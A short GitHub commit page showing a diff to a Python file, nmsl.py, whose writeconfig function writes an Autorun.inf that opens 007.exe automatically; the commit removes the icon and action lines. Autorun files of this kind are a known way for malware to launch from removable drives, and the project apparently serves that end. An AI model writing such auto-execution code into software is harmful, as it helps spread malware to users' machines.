We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
1 parent 9f5c143 commit 7360578Copy full SHA for 7360578
nmsl.py
@@ -10,8 +10,6 @@ def writeconfig:
10
autorun='''
11
[autorun]
12
open=007.exe
13
- icon=007.exe
14
- action=walawalaningningwalaningning
15
'''
16
with open("Autorun.inf",'w') as loadautorun:
17
loadautorun.write(autorun)
0 commit comments